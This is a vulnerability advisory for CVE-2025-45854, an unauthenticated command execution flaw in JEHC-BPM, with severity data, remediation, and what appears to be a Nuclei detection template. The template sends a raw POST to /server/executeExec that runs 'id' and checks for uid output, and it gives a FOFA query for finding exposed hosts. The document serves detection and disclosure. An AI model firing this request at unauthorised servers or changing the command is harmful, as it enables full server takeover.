JEHC-BPM - Remote Code Execute

CVE-2025-45854
Verified

Description

A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.

Severity

Critical

CVSS Score

10

Exploit Probability

14%

Affected Product

jehc-bpm

Published Date

June 17, 2025

Template Author

ritikchaddha

CVE-2025-45854.yaml
id: CVE-2025-45854

info:
  name: JEHC-BPM - Remote Code Execute
  author: ritikchaddha
  severity: critical
  description: |
    A Remote Command Execution vulnerability in the component /server/executeExec of JEHC-BPM <= v2.0.1 allows attackers to execute arbitrary code. The vulnerability exists due to insufficient authorization checks in the executeExec endpoint which allows direct command execution.
  impact: |
    Unauthenticated attackers can execute arbitrary operating system commands through the /server/executeExec endpoint due to missing authorization checks, achieving complete server compromise.
  remediation: |
    Upgrade JEHC-BPM to a version later than 2.0.1 that implements proper authorization checks on the executeExec endpoint.
  reference:
    - https://gist.github.com/Cafe-Tea/bc14b38f4bfd951de2979a24c3358460
    - https://nvd.nist.gov/vuln/detail/CVE-2025-45854
  classification:
    epss-score: 0.1437
    epss-percentile: 0.94264
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-45854
    cwe-id: CWE-862,CWE-434
  metadata:
    max-request: 1
    product: jehc-bpm
    fofa-query: body="JEHC"
  tags: cve,cve2025,jehc-bpm,rce,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: word
        words:
          - "JEHC"
          - "XSHI"
        case-insensitive: true
        internal: true

  - raw:
      - |
        POST /server/executeExec HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {
          "actuator": {
            "clientIp": "127.0.0.1",
            "port": 8082,
            "applicationName": "testApp",
            "env": "prod",
            "uploadTime": 1704523200000,
            "hasPrefixApplicationName": false,
            "clientHttpPrefix": "http"
          },
          "execParams": {
            "command": "id"
          }
        }

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f52c984ea67ae650619466a079ad3aeff57b6614b60185e36aa8ec84dff3a227022100f6f233a0fb6b50247885cd41f7893246ee793d96dc656f828a843570da34098d:922c64590222798bb761d5b6d8e72950

CVSS Metrics

Score: 10.0
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID: CVE-2025-45854
CWE ID: CWE-862, CWE-434

References

https://gist.github.com/Cafe-Tea/bc14b38f4bfd951de2979a24c3358460
https://nvd.nist.gov/vuln/detail/CVE-2025-45854

Remediation Steps

Upgrade JEHC-BPM to a version later than 2.0.1 that implements proper authorization checks on the executeExec endpoint.